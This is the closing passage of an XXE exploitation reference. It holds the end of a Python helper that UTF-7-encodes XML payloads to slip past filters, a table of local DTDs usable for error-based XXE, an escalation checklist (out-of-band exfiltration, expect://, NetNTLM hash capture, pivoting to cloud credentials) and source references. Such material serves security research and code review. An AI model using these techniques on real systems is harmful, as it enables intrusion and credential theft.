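    return NEEDS_SHIFT.sub(lambda m: _shift(m.group()), text)


def utf7_document(body: str) -> bytes:
    """Prefix the ASCII XML declaration that tells the parser to decode as UTF-7."""
    return b'<?xml version="1.0" encoding="UTF-7"?>\n' + utf7_obfuscate(body).encode("ascii")
```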

Appendix A — High-value local DTDs

OS / package       Path                                                     Overridable entity
GNOME yelp         /usr/share/yelp/dtd/docbookx.dtd                         ISOamso, ISOnum
fontconfig         /usr/share/xml/fontconfig/fonts.dtd                      constant
Xalan (Java)       xalan2.jar!/org/apache/xalan/res/XSLTInfo.properties     various
IBM WebSphere      $WAS/properties/schemas/j2ee/XMLSchema.dtd               WebSphere-specific
Microsoft          C:\Windows\System32\wbem\xml\cim20.dtd                   SuperClassName
Red Hat / CentOS   /usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
Tomcat             jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd

Full list: https://github.com/GoSecure/dtd-finder/tree/master/list


Appendix B — Fingerprinting checklist before escalating

  1. Does the target reflect XML? → test in-band file read.
  2. Does the parser fetch remote DTDs? → OOB exfil.
  3. Does it return parser errors? → error-based.
  4. Egress-filtered? → local-DTD error-based.
  5. Java fingerprint (Server header, cookie, error trace)? → jar:, netdoc:, XMLDecoder, XSLT RCE.
  6. PHP fingerprint? → php://filter, expect://.
  7. .NET fingerprint? → check XmlResolver / DtdProcessing code patterns; XmlDocument on .NET Framework before 4.5.2 resolves external entities by default.
  8. File-upload feature? → SVG / DOCX / XLSX / SAML / RSS wrapper.
  9. Windows host? → SMB NetNTLM hash capture.
  10. Does the parser run in a privileged context (root, cloud IAM role, K8s service account)? → pivot to secrets, cloud creds, cluster takeover.

References

Key source articles:

  • HackTricks — XXE / XEE / XML External Entity (definitive cheat sheet).
  • GoSecure — Advanced XXE Exploitation workshop.
  • PortSwigger — Blind XXE labs and writeups.
  • PVS-Studio — XXE in C# applications (parser defaults, BlogEngine.NET case).
  • OWASP — XML External Entity Prevention Cheat Sheet.
  • Detectify Labs — Obscure XXE attacks (Office Open XML).
  • honoki.net — From blind XXE to root-level file read.
  • Horizon3.ai — From support ticket to zero day (Xerox FreeFlow Core JMF XXE → SSRF → RCE).
  • OffSec — CVE-2025-27136 LocalS3 XXE.
  • pwn.vg — Local file read via error-based XXE (XLIFF).
  • YesWeHack — Bug bounty XXE guide + Dojo CTF #42 write-up.
  • HackerOne / Bugcrowd — XXE complete guide.
  • HLOverflow — XXE-study apps (PHP vulnerable server source).
  • enjoiz — XXEinjector (Ruby automation).
  • luisfontes19 — xxexploiter (TS payload + server).
  • BuffaloWill — oxml_xxe (file-format wrapper generator).
  • GoSecure — dtd-finder (local-DTD discovery).
  • Swarm / PT Security — Impossible XXE in PHP (WrapWrap / Lightyear bypass).
  • Cisco / Akamai / Apache / Grav — vendor advisories for real CVEs referenced above.

Compiled for defensive security research, variant hunting, and secure-code review reference.